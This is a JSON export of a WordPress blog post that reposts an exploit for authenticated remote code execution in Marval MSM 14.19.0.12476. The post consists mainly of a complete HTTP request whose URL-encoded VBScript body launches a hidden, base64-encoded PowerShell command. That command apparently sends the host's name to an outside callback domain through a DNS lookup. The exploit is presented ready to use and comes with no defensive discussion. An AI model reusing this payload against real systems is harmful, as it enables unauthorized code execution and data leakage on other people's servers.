{"id":25920,"date":"2022-06-19T22:20:04","date_gmt":"2022-06-19T18:20:04","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167471\/marvalmsm1419012476-exec.txt"},"modified":"2022-06-26T09:51:36","modified_gmt":"2022-06-26T05:21:36","slug":"marval-msm-14-19-0-12476-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/marval-msm-14-19-0-12476-remote-code-execution\/","title":{"rendered":"Marval MSM 14.19.0.12476 Remote Code Execution"},"content":{"rendered":"<p dir=\"ltr\"># Exploit Title: Marval MSM v14.19.0.12476 &#8211; Remote Code Execution (RCE) (Authenticated)<br \/>\n# Date: 27\/5\/2022<br \/>\n# Exploit Author: Momen Eldawakhly (Cyber Guy)<br \/>\n# Vendor Homepage: https:\/\/www.marvalnorthamerica.com\/<br \/>\n# Software Link: https:\/\/www.marvalnorthamerica.com\/<br \/>\n# Version: v14.19.0.12476<br \/>\n# Tested on: Windows<br \/>\n# Detailed blog: https:\/\/cyber-guy.gitbook.io\/cyber-guy\/blogs\/marval-msm-rce<\/p>\n<p dir=\"ltr\">POST \/MSM_Test\/RFP\/Forms\/ScriptHandler.ashx?method=ProcessScript&amp;classPath=%2FMSM_Test%2FRFP%2FForms%2FScriptMaintenance.aspx&amp;classMode=WXr8G2r3eh0wvNjbiIT6aYVgZATjWlaZW0UFQrQrcAku4qWefyYTUu%2BzULTTON0fQaLjNtnCW7VX%2Fj1rYPDpKKN%2F8HPLGRSpVbdvPaR4mPIrSr4Aj22VMuIDEkMTpPhoq3gX8p4TBir56GBTJcpLv1agwKPB%2BWI%2F2TlU%2FjQKzz0%3D HTTP\/2<br \/>\nHost: MSMHandler.io<br \/>\nCookie: ASP.NET_SessionId=arrsgikvbwbagdsvetfvphbu; appNameAuth=B3D1490922B24585684E139359F3BB93D8D92468A906B1FEA01EB4CF760A23DC90BF30327784677BBC00C5860C145602EF39BB9BEBB6A451E57DBF42C47B7D0CDE09F4CE15D2A5BEBFFCE5A7BFCF7DED8D8B17036F2BCE3DDA873B542EED614B9B42E4B5E4AA18BBE32CC0EB864E6825C898A2F465A42E871DF13F19845E171697D5E23688EAD29D3F6B221DBF18002DE5B929DBA88D42B4B518BC95F5BC5F3A3D36722F<br \/>\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko\/20100101 Firefox\/100.0<br \/>\nAccept: application\/json, text\/javascript, *\/*<br \/>\nAccept-Language: en-US,en;q=0.5<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nContent-Type: application\/x-www-form-urlencoded<br \/>\nX-Requested-With: XMLHttpRequest<br \/>\nContent-Length: 456<br \/>\nOrigin: https:\/\/MSMHandler.io<br \/>\nDnt: 1<br \/>\nReferer: https:\/\/MSMHandler.io\/MSM_Test\/RFP\/Forms\/ScriptMaintenance.aspx?id=3<br \/>\nSec-Fetch-Dest: empty<br \/>\nSec-Fetch-Mode: cors<br \/>\nSec-Fetch-Site: same-origin<br \/>\nTe: trailers<\/p>\n<p dir=\"ltr\">type=%221%22&amp;content=%22%5Cn%5CnFunction+Pwn()%5Cn++Set+shell+%3D+CreateObject(%5C%22wscript.Shell%5C%22)%5Cn%5Cn%5Cn++++shell.run+%5C%22powershell.exe+-nop+-w+hidden+-E+%5C%22%5C%22JAB2AGEAcgA9AGgAbwBzAHQAbgBhAG0AZQA7AG4AcwBsAG8AbwBrAHUAcAAgAGsAcgBmADUAbAB2AGYANABzAGUAdABtAGoAMgB2AG4AZABiADUAOQBsADQAdgBtAGcAZABtADUAawB0ADkALgAkAHYAYQByAC4AbwBhAHMAdABpAGYAeQAuAGMAbwBtAA%3D%3D%5C%22%5C%22%5C%22%5Cn%5Cn%5CnEnd+Function%5Cn%5CnPwn%22&amp;id=%2226%22&amp;isCi=true<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Marval MSM v14.19.0.12476 &#8211; Remote Code Execution (RCE) (Authenticated) # Date: 27\/5\/2022 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: https:\/\/www.marvalnorthamerica.com\/ # Software Link: https:\/\/www.marvalnorthamerica.com\/ # Version: v14.19.0.12476 # Tested on: Windows # Detailed blog: https:\/\/cyber-guy.gitbook.io\/cyber-guy\/blogs\/marval-msm-rce POST \/MSM_Test\/RFP\/Forms\/ScriptHandler.ashx?method=ProcessScript&amp;classPath=%2FMSM_Test%2FRFP%2FForms%2FScriptMaintenance.aspx&amp;classMode=WXr8G2r3eh0wvNjbiIT6aYVgZATjWlaZW0UFQrQrcAku4qWefyYTUu%2BzULTTON0fQaLjNtnCW7VX%2Fj1rYPDpKKN%2F8HPLGRSpVbdvPaR4mPIrSr4Aj22VMuIDEkMTpPhoq3gX8p4TBir56GBTJcpLv1agwKPB%2BWI%2F2TlU%2FjQKzz0%3D HTTP\/2 Host: MSMHandler.io Cookie: ASP.NET_SessionId=arrsgikvbwbagdsvetfvphbu; appNameAuth=B3D1490922B24585684E139359F3BB93D8D92468A906B1FEA01EB4CF760A23DC90BF30327784677BBC00C5860C145602EF39BB9BEBB6A451E57DBF42C47B7D0CDE09F4CE15D2A5BEBFFCE5A7BFCF7DED8D8B17036F2BCE3DDA873B542EED614B9B42E4B5E4AA18BBE32CC0EB864E6825C898A2F465A42E871DF13F19845E171697D5E23688EAD29D3F6B221DBF18002DE5B929DBA88D42B4B518BC95F5BC5F3A3D36722F User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-25920","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/25920","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=25920"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/25920\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=25920"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=25920"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=25920"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}